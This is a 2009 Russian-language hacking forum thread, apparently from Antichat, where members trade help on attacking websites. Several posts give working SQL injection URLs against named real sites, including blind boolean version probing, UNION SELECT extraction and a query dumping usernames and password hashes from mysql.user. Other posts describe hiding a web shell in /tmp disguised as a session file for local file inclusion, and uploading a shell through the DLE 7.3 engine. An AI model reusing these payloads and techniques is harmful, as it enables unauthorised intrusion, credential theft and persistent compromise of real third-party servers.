Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    305
    Likes Received:
    92
    Reputations:
    33
    скопирует в текущий каталог
    если хотите в другое место, можно использовать абсолютный путь который начинается с "/"
    ну или относительный "../../dir1/shell"
     
    1 person likes this.
  2. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    288
    Likes Received:
    402
    Reputations:
    159
    Проще тогда скопировать в /tmp/sess_26ac3fa833f07595698de0e73b8fa113.
    Есть несколько плюсов:
    1) 99% есть права на запись в диру
    2) меньше палева, файл маскируется под сессию, и сидит там молча. =)

    Потом инклудишь его index.php?page=/tmp/sess_26ac3fa833f07595698de0e73b8fa113
    а потом уже перезаливаешь нормальный куда тебе нравится.
     
    1 person likes this.
  3. fast_start

    fast_start New Member

    Joined:
    13 Aug 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    http://www.inderscience.com/browse/index.php?journalID=114'

    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 30

    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 38
    Query Error:
    SELECT coverImage FROM comanche.journalsMetadata WHERE sectionID=114\'
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


    что можно сделать? надеюсь я не ошибся темой) :confused:
     
  4. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    198
    Likes Received:
    161
    Reputations:
    108
    Крутить как слепую...
    Например http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING((SELECT+version()),1,1))>=100,1,0)-- выдает ошибку, значит наш ascii символ меньше...
    пробуем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING((SELECT+version()),1,1))>=50,1,0)-- ошибки нет, значит символ больше, http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING((SELECT+version()),1,1))>=52,1,0)-- максимальное значение на котором не выдает ошибку, проверяем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING((SELECT+version()),1,1))=52,1,0)-- ошибки нет, верно.
    Т.е. первый ascii символ равен 52, значит версия мускуля 4-я.

    Подробнее https://forum.antichat.ru/showpost.php?p=407227&postcount=3
     
  5. u36a

    u36a Member

    Joined:
    18 Nov 2008
    Messages:
    81
    Likes Received:
    5
    Reputations:
    0
    Есть доступ к бд, где таблицы dle (просмотр\запись, не root@mysql). Может можно там поменять пути на файлы?

    Странно, но не могу найти, где добавлять файлы к новостям, в настройках разрешил добавлять файлы, указал расширения нужные, размер и т.п. А там где добавление новостей или их редактирование не могу найти, как всунуть атач. :)
     
  6. fraIzer

    fraIzer Member

    Joined:
    27 Jul 2009
    Messages:
    11
    Likes Received:
    8
    Reputations:
    0
    К чему такие громоздкие конструкции?
    Code:
    http://www.inderscience.com/browse/index.php?journalID=114+and+substring(version(),1,1)=4/*
    Этого достаточно...
     
  7. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    198
    Likes Received:
    161
    Reputations:
    108
    достаточно для определения версии не более, а буквы ты тоже будешь с числами сравнивать? а вот ascii код можно...
     
  8. fast_start

    fast_start New Member

    Joined:
    13 Aug 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    http://www.broowaha.com/profile.php?id=2434+ORDER+BY+18/* выдает ошибку,
    http://www.broowaha.com/profile.php?id=2434+ORDER+BY+17/* срабатывает нормально. ОК,значит столбцов 17.
    Делаю http://www.broowaha.com/profile.php?id=2434+UNION+SELECT+11111,22222,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
    но ничего не выводит. Пытался определить версию, методом, которым вы меня научили:
    http://www.broowaha.com/profile.php?id=2434+AND+1=IF(ASCII(SUBSTRING((SELECT+version()),1,1))%3E=52,1,0)/*
    ответ таков:
    Error, select query failed: 1064:You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT version()),1,1))>=52,1,0)/* AND tAuthors.status = 'activ
    Как дальше действовать?
     
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    406
    Reputations:
    196
    http://www.broowaha.com/profile.php?id=-2434+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,0,11,12,13,14,15,16,17/*
     
    1 person likes this.
  10. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Code:
    http://www.inderscience.com/browse/book.php?journalID=1001&year=2005&action=chapter&chapNum=23+union+select+1,2,3,unhex(hex(concat(file_priv,0x3a,user,0x3a,password))),5,unhex(hex(concat(version(),0x3a,user(),0x3a,database()))),7+from+mysql.user--
    nemaniak, fraIzer не стоит торопиться с выводами.
     
  11. pento

    pento Elder - Старейшина

    Joined:
    3 Jul 2006
    Messages:
    126
    Likes Received:
    24
    Reputations:
    -1
    Вопрос: есть бажный PHP-скрипт, который использует значение переменной HTTP_HOST при генерации XML (то есть в самом XML это значение используется без какого-либо экранирования спец. символов) и потом его отдаёт на скачивание. Что можно провернуть в данном случае? Да, мы можем варьировать HTTP Host заголовком..но что это нам даёт?
     
  12. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    если изменить поле Host в запросе то веб-сервер просто не узнает какому из виртуальных хостов пришел запрос. То есть до скрипта он уже вряд ли дойдет
     
  13. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Если у тебя есть обычная скуля.
    Зачем мучать себя слепой?
    Кстате скачай лучше SIPT 4.
     
  14. fraIzer

    fraIzer Member

    Joined:
    27 Jul 2009
    Messages:
    11
    Likes Received:
    8
    Reputations:
    0
    Речь шла о конкретной скуле!!! Ты же показываешь совершенно другую!!!

    Опять же на протяжении всего поста ты показывал ему как узнать версию, я и подмитил, что не к чему использовать такие громоздкие конструкции при определении версии(это не оправдывает себя), вот когда названия таблиц и столбцов подбирать начнешь, тогда да, но это совершенно другой вопрос, так или иначе то, что ты ему объяснил, это как вилами по воде, надеюсь понимаешь о чём я.
     
  15. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Если вам надо версию то )
    &chapNum=-1+union+select+version() :)
    И таким макаром
     
    1 person likes this.
  16. pento

    pento Elder - Старейшина

    Joined:
    3 Jul 2006
    Messages:
    126
    Likes Received:
    24
    Reputations:
    -1
    Только в случае, если виртуальные хосты host-based.
    Уязвимость имеет место, то есть скрипт исполняется и в теле XML фигурирует значение Host-заголовка.
     
  17. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    нашел скулю но там какая-та фильтрация
    смотрим

    видим 1 юзера
    http://playthegame.od.ua/index.php?action=9&showuser=3058

    видем юзера под ид 3057
    http://playthegame.od.ua/index.php?action=9&showuser=3058-1

    если делаем так то видим ошибку
    http://extremission.com.ua/index.php?action=8

    но при попытки
    http://playthegame.od.ua/index.php?action=9&showuser=3058
    дописать что-то типо union select и т.п. ничего не получаеться....
    есть идеи*?
     
  18. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    198
    Likes Received:
    161
    Reputations:
    108
    я тебе сказал крутить как слепую твой прошлый пример, т.к. именно в том параметре я других вариантов не видел, это не значит, что так надо крутить все скули. Нафига тебе эти сложности, если эту можно раскрутить как обычную, т.е. как написал попугай.

    Ну это уже конкретика, естественно, что у каждого свои трики, которыми он пользуется, для меня лично легче сразу написать всю конструкцию с ascii(), а потом поменять version() например на user(), чем писать сначала без ascii() а потом ее дописывать... а вообще это все хрень, так все равно никто вручную все базы, столбцы, данные и т.д. перебирать не будет...
     
    #8438 nemaniak, 16 Aug 2009
    Last edited: 16 Aug 2009
  19. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    ne nadoelo? Nu prob'esh ty golovoy stenku. chto ty budesh delat' v sosednej kamere?
     
  20. u36a

    u36a Member

    Joined:
    18 Nov 2008
    Messages:
    81
    Likes Received:
    5
    Reputations:
    0
    .php перед flv убирается движком..

    Удалось залить файл ......../uploads/files/1250379992_functions.phtml.flv

    но он не интрепретируется, а скачивается...

    Какие ещё есть варианты залить шел через движок дле 7.3 версии?
     
Loading...
Thread Status:
Not open for further replies.